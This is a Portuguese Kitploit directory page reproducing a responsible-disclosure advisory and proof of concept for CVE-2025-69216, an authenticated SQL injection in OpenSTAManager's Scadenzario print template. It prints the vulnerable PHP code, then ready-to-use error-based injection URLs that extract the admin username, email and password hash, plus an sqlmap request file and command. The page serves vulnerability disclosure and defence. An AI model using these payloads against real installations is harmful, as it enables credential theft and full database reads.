Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-69216 — Repositório de prova de conceito para CVE-2025-69216, uma injeção SQL autenticada no template de impressão Scadenzario do OpenSTAManager, permitindo a extração de credenciais de administrador e do conteúdo do banco de dados por meio de SQLi baseada em erro e cega. | Kitploit
Ferramentas/GitHubGitHub/lukasz-rybak/cve-2025-69216
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoSegurança de Banco de Dados
GitHublukasz-rybak/cve-2025-69216

CVE-2025-69216

Repositório de prova de conceito para CVE-2025-69216, uma injeção SQL autenticada no template de impressão Scadenzario do OpenSTAManager, permitindo a extração de credenciais de administrador e do conteúdo do banco de dados por meio de SQLi baseada em erro e cega.

Ver Repositório
3há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-69216: OpenSTAManager tem uma Injeção de SQL no Modelo de Impressão Scadenzario

Visão Geral

CampoDetalhes
ID do CVECVE-2025-69216
GravidadeHIGH
Aviso de SegurançaVer Aviso de Segurança
Descoberto porLukasz Rybak

Produtos Afetados

  • devcode-it/openstamanager (versões: <= 2.9.8)

Classificação CWE

  • CWE-89: Neutralização inadequada de elementos especiais usados em um comando SQL ('Injeção de SQL')

Detalhes

Resumo

Uma vulnerabilidade de injeção de SQL autenticada no modelo de impressão Scadenzario (Cronograma de Pagamentos) do OpenSTAManager permite que qualquer usuário autenticado extraia dados confidenciais do banco de dados, incluindo credenciais de administrador, informações de clientes e registros financeiros. A vulnerabilidade possibilita acesso completo de leitura ao banco de dados por meio de técnicas de injeção de SQL baseadas em erro.

Detalhes

A vulnerabilidade existe em templates/scadenzario/init.php na linha 46, onde o parâmetro id_anagrafica é concatenado diretamente em uma consulta SQL sem a sanitização adequada:

Código Vulnerável:

root@kitploit:~
if (get('id_anagrafica') && get('id_anagrafica') != 'null') {
    $module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query);
    $id_anagrafica = get('id_anagrafica');
}

A função get() obtém a entrada do usuário a partir de parâmetros GET/POST sem validação. O valor do parâmetro é incorporado diretamente na string da consulta SQL usando concatenação de strings, em vez da função de sanitização prepare() da aplicação, possibilitando ataques de injeção de SQL.

Causa raiz:

  • Ausência do uso da função prepare() para sanitização de entrada
  • Concatenação direta de strings na construção da consulta SQL
  • Ausência de validação de entrada e verificação de tipo

Endpoint Afetado:

root@kitploit:~
/pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD]

Arquivos Afetados:

  • templates/scadenzario/init.php (linha 46) - Vulnerabilidade primária
  • templates/scadenzario/init.php (linhas 34, 40) - Padrão semelhante com parâmetros de data
  • pdfgen.php - Ponto de entrada para a renderização do modelo

PoC (Prova de Conceito)

Pré-requisitos

  • Sessão autenticada válida (qualquer perfil de usuário)

Etapas de Exploração

1. Confirmar a Vulnerabilidade - Teste Básico de Erro de Sintaxe:

root@kitploit:~
 http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20

Erro de sintaxe SQL exibido na resposta da aplicação

imagem

2. Extrair a Versão do Banco de Dados - SQLi Baseada em Erro:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221

Resultado: ~8.3.0~ (versão do MySQL)

imagem

3. Extrair o Nome do Banco de Dados:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221

Resultado: ~openstamanager~

imagem

4. Extrair o Nome de Usuário do Administrador:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Resultado: ~admin~ imagem


5. Extrair o E-mail do Administrador:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Resultado: Endereço de e-mail do administrador

imagem

6. Extrair o Hash da Senha (Parcial - Limite de 31 caracteres do XPATH):

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Resultado: hash da senha bcrypt

imagem

7. Exploração Automatizada com SQLMap:

Crie o arquivo de requisição sqli_osm.req:

root@kitploit:~
GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=[SESSION_COOKIE]
User-Agent: Mozilla/5.0

Execute o SQLMap:

root@kitploit:~
sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs

Tipos de Injeção Confirmados pelo SQLMap:

  • ✅ Injeção SQL cega baseada em booleano
  • ✅ Injeção SQL baseada em erro (MySQL >= 5.6 GTID_SUBSET)
  • ✅ Injeção SQL cega baseada em tempo (SLEEP)
imagem

Impacto

Quem é Afetado:

  • ✅ Todos os usuários autenticados - Qualquer usuário com credenciais válidas pode explorar esta vulnerabilidade
  • ✅ Usuários de baixo privilégio - Até mesmo usuários com permissões mínimas podem acessar dados de nível administrativo
  • ✅ Todas as instalações do OpenSTAManager - A vulnerabilidade existe no branch master mais recente

Atribuição

Reportado por Łukasz Rybak

Referências

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69216
  • https://github.com/advisories/GHSA-q6g3-fv43-m2w6

Aviso Legal

Este CVE foi divulgado de forma responsável, seguindo práticas coordenadas de divulgação de vulnerabilidades. As informações fornecidas aqui são apenas para fins educacionais e defensivos.

Baixar ferramenta